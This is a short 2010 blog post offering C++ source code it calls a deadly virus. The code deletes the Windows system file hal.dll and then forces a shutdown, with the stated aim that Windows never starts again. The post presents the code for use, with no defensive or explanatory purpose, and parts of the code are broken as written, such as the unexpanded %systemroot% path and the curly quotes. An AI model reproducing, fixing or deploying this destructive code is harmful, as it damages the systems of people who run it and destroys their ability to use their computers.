- Back to Home »
- Viruses »
- A deadly C++ Virus that corrupt the Windows
Posted by : Anonymous
Monday, November 29, 2010
The following is the source code of the Virus that would curropt the windows and shutdown. But the Windows will never start up again.
#include <iostream.h>
#include <windows.h>
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“%systemroot%\\system32\\hal.dll”);
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}